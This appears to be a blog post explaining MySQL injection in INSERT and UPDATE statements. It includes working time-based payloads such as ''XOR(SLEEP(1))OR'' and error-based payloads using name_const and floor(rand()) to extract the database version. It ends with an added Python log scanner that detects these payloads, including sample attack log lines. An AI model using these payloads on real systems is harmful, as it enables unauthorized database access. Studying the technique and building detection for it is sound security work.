Heya! It’s been a long while since I wrote something here, so I thought I’d dust off the blogger keyboard and get some posts going. To start off I will cover MySQL injection in INSERT and UPDATE statements. What injection points in an INSERT query can we extract data from? In the previous INSERT post we covered the VALUES() injection point (INSERT INTO tbl_name (column_name) VALUES ([here]), ([and here])), but there are other ways to forge an INSERT statement.
INSERT INTO tbl_name SET column_name = '[here]'
INSERT INTO tbl_name (column_name1, column_name2) SELECT 'hello', '[here]'
The problem with the first case is that we don’t know the column names, and with the second, we don’t know the column count. Since we don’t know the column names, we can’t insert another “SET column_name = value” into the first statement, so we will have to figure out a way to get around this. And for the second, we also have to figure out something we can insert without screwing up the query.
So what can we do?
We can add to the string value that already exists! But what can we do with just a string value? Well, all bitwise operations (NOT, OR, XOR, AND) work, and there is no need for spaces! Let’s craft an injection that works with the first scenario.
INSERT INTO tbl_name SET column_name = ''XOR(SLEEP(1))OR'' [...]
It works, and it returns 0 from the XOR operation! Now let’s try putting that into the second query.
INSERT INTO tbl_name (column_name1, column_name2) SELECT 'hello', ''XOR(SLEEP(1))OR''
It also works! Splendid. What about UPDATE and SELECT statements? Yup, it’s the same with those. I have written a neat proof of concept for this that searches GET variables (yes, I know, who the hell would insert something from a GET variable? But whatever!) and common headers (including Referer and User-Agent) for these kinds of injections, and here is the source code!
My case here is a numeric type, so I don’t append the OR after xor(); if it is a string type, use the foreign hacker’s statement XOR(SLEEP(1))OR. When you run into an UPDATE, the method is the same as for INSERT.
and exists(select * from ( select * from (select name_const(version(),0) )a join (select name_const(version(),0) )b )c )
and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT version()))a from information_schema.tables group by a)b)
Using xor/or together with an error-based statement lets you inject just like with a SELECT, haha, pretty sweet, right!~
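As an added defensive example (not code from the original post or its proof of concept), the following Python scans the same places the PoC probes, the query string and the Referer/User-Agent headers, for the operator-wrapped SLEEP payloads described in the post and the error-based name_const / floor(rand()) statements quoted in the reply above. The log layout and the sample lines are constructed assumptions for this example.

```python
import re
from urllib.parse import unquote_plus

# Combined-log-style line (client, ident, user, time, request, status, size,
# Referer, User-Agent); the exact layout is an assumption for this example.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" \d+ \S+ '
    r'"(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"$'
)
# Signatures for the payload shapes discussed on the page: a bitwise/boolean operator
# applied directly to a delay function, and the error-based name_const / floor(rand()) forms.
SIGNATURES = {
    "operator_time_delay": re.compile(r"\b(?:xor|or|and|not)\s*\(\s*(?:sleep|benchmark)\s*\("),
    "error_based_name_const": re.compile(r"name_const\s*\("),
    "error_based_floor_rand": re.compile(r"floor\s*\(\s*rand\s*\(.*\bgroup\s+by\b"),
}

def normalize(value: str) -> str:
    """URL-decode twice (catches double encoding) and lowercase a field."""
    return unquote_plus(unquote_plus(value)).lower()

def find_signatures(value: str) -> list:
    """Names of every signature matching the normalized field value."""
    text = normalize(value)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]

def scan_log(lines) -> list:
    """Check request line, Referer and User-Agent; return (ip, field, signature) hits."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # unexpected layout: skip rather than guess
        for field in ("request", "referer", "user_agent"):
            for sig in find_signatures(m.group(field)):
                findings.append((m.group("ip"), field, sig))
    return findings

# Constructed sample lines (not from the original post); the last three carry the
# payload shapes from the text in the query string or in a header.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /comment?msg=hello HTTP/1.1" 200 512 "http://example.test/" "Mozilla/5.0"',
    '10.0.0.7 - - [01/Jan/2024:12:00:01 +0000] "GET /comment?msg=%27%27XOR(SLEEP(1))OR%27%27 HTTP/1.1" 200 512 "http://example.test/" "Mozilla/5.0"',
    '10.0.0.8 - - [01/Jan/2024:12:00:02 +0000] "GET /comment?msg=hi HTTP/1.1" 200 512 "-" "\'\'XOR(SLEEP(5))OR\'\'"',
    '10.0.0.9 - - [01/Jan/2024:12:00:03 +0000] "GET /item?id=1%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),(SELECT%20version()))a%20from%20information_schema.tables%20group%20by%20a)b) HTTP/1.1" 500 0 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for ip, field, sig in scan_log(SAMPLE_LOG):
        print(f"{ip}: {sig} in {field}")
```

Because the decoded fields are lowercased, the signatures also catch the mixed-case and URL-encoded variants of the same payloads.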